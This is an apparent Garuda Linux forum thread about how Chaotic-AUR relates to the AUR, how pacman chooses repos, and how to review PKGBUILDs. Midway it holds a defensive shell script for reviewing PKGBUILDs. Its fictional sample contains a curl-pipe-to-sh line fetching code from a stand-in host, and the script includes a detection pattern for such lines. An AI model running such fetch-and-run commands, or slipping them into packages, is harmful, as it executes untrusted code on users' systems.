Noob questions about Chaotic-AUR

Hi there everyone!

I have a very noob question, sorry in advance, I looked around but didn’t find any answer.

As I was requesting a package to be added to chaotic-AUR, we had a discussion on this very forum about package security, saying that even if there’s additional review, everything that is in chaotic-AUR is still pulled from AUR and users should review the PKGBUILD and be cautious.

That being said, after a clean install, I can see that some packages are pre-installed on Garuda from chaotic-AUR (see pic attached).

I tried to check a bit around, and software like Octopi, for example, is pulled from AUR and sourced from a dev called Alexandre Arnt’s repo.

So here are my questions:

  • I’m quite sure you’ve checked and double-checked what’s pre-installed from AUR, but why aren’t those packages directly in the garuda repository?
  • If I try to install something with pacman using CLI, and the software is in the chaotic-AUR repo, it’s gonna be installed directly (as opposed to voluntarily using yay, for example, to build from AUR). How can I be sure I’m not installing from chaotic-AUR without reviewing the package (except by using Octopi)?
  • Can chaotic-AUR repo be deactivated without breaking Garuda’s packages, as apparently some core packages are pre-installed from there?

Thanks a lot for your time, and please forgive my noob questions!

My understanding of the Chaotic-AUR repo is that these are pre-compiled binaries of packages that are found in the AUR - Arch User Repository. To quote the ArchWiki:

“The Arch User Repository (AUR) is a community-driven repository for Arch Linux users. It contains package descriptions (PKGBUILDs) that allow you to compile a package from source with makepkg and then install it via pacman. The AUR was created to organize and share new packages from the community and to help expedite popular packages’ inclusion into the extra repository. This document explains how users can access and utilize the AUR.”

As such, Chaotic-AUR is just a “nice” for those who don’t wish to compile the binaries themselves and/or have hardware that’s inefficient at compilation and don’t wish to wait, and/or don’t want to wait for Rust or other large applications to compile a package as that can take FOREVER in some cases (lookin’ at you GCC14).

pacman does not work with the AUR repo directly, which is often why we suggest using paru (garuda default) or yay - as these are AUR wrappers that will manage the installation and upgrade of packages that are only in the AUR repo, as pacman -Syu does not include AUR installed packages. I think the general preference for Garuda as a distro is to always use garuda-update either in shell or via Rani which leverages paru and will update your AUR installed packages. Since Chaotic-AUR is a repo with precompiled binaries, and it’s been added as a repo in your pacman.conf by default, pacman can install packages from that repo, since it does not “recognize” the aur repo alone, so if the same package exists in aur and chaotic-aur, then pacman will only “see” the chaotic-aur package. However, if you use paru or yay it will ask you to pick which repo you wish to use. If you select the aur version, then it usually prompts you to review the PKGBUILD before you approve the installation. While a cursory review of the PKGBUILD is usually sufficient, often there are post installation scripts which can contain malicious code/malware that is not reviewed in the PKGBUILD and so further scrutiny may be necessary to manually review the post-installation script to ensure everything is above board.

I don’t think you can, no. I think there are some base garuda packages that are in chaotic-aur and disabling this will severely curtail or damage your system.

As for some of your other questions, I’ll leave others who may be more knowledgeable to address them.

3 Likes

Thanks a LOT for your detailed answer! It makes more sense to me now!

Note: if you use garuda-update from the cli you will need to add -a. So garuda-update -a

As for chaotic and safety: if you want to see the pkgbuild because the name of the pkg seems off, just look it up here https://aur.archlinux.org/ . You can go one step further than the pkgbuild and check its Upstream URL; most are github/gitlab. If you’re not into looking at the code, check the issue tracker; if it looks activeish you can kinda guess most things are alright or it would be called out.

I’ve been using chaotic since 2023 and never had an issue as of yet, but I don’t really grab weird pkgs.
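The two replies above both boil down to the same review routine: read the PKGBUILD, look at the `install=` hook (the .install script pacman runs at install/upgrade/remove time, which the PKGBUILD itself does not show you), check where the sources come from, and be suspicious of checksums set to SKIP or of build functions that fetch and run code over the network. The script below is an added example written for this thread; it is not code from Garuda, paru, pacman or the forum posters. It works on PKGBUILD text read from stdin, and the PKGBUILD it ships with is a constructed sample (the package and URLs are made up) so it runs offline.

```shell
#!/bin/sh
# PKGBUILD review aid (added example, not from the forum thread or any project).
# Each helper reads PKGBUILD text on stdin and prints one finding a reviewer
# should look at before approving a build.

# Constructed sample PKGBUILD: a fictional package with the things the thread
# warns about (an .install hook, SKIP checksums, a curl|sh in package()).
sample_pkgbuild() {
cat <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
install=example-tool.install
source=("https://github.com/example/example-tool/archive/v${pkgver}.tar.gz"
        "https://example.invalid/helper.sh")
sha256sums=('SKIP' 'SKIP')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  curl -s https://example.invalid/extra.sh | sh
  make DESTDIR="$pkgdir" install
}
EOF
}

# Name of the .install hook file, or nothing if the PKGBUILD has none.
# That file is what you must open separately; pacman runs its pre_/post_
# functions as root and it is not part of the PKGBUILD diff you are shown.
install_hook() {
    grep -E '^install=' | cut -d= -f2 | tr -d "\"'"
}

# Every http(s) URL in the file: source= entries plus anything a build
# function fetches itself. Compare these with the package's Upstream URL.
list_urls() {
    tr -d "\"'" | grep -oE 'https?://[^ )]+'
}

# Number of checksum entries set to SKIP, i.e. sources that are not pinned.
skipped_checksums() {
    grep -o 'SKIP' | wc -l | tr -d ' '
}

# Number of lines that download something and pipe it straight into a shell.
pipe_to_shell_count() {
    grep -cE '(curl|wget).*\|[[:space:]]*(ba)?sh'
}

# Print the whole report for the PKGBUILD on stdin.
review() {
    pkgbuild=$(cat)
    printf 'install hook   : %s\n' "$(printf '%s\n' "$pkgbuild" | install_hook)"
    printf 'URLs referenced:\n'
    printf '%s\n' "$pkgbuild" | list_urls | sed 's/^/  /'
    printf 'SKIP checksums : %s\n' "$(printf '%s\n' "$pkgbuild" | skipped_checksums)"
    printf 'curl/wget | sh : %s\n' "$(printf '%s\n' "$pkgbuild" | pipe_to_shell_count)"
}

# Run the demo only when asked, so the helpers can be sourced from elsewhere.
if [ "${1:-}" = "--demo" ]; then
    sample_pkgbuild | review
fi
```

To use it on a real package, save the PKGBUILD you download from aur.archlinux.org to a file and run `review < PKGBUILD`; then open the file named under "install hook" yourself. For the OP's second question (which repo pacman will actually pull a package from), `pacman -Si <pkgname>` prints a `Repository` line, so you can see whether it resolves to core/extra, garuda or chaotic-aur before you install.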

Because we would effectively build them twice on our servers. That’s simply wasted processing power. Historically there was no Garuda repository and all of it was in Chaotic-AUR.

Regarding security I would argue that the situation has changed a little as we now do indeed review updates if it’s a) untrusted maintainer and b) anything bigger than a simple version change.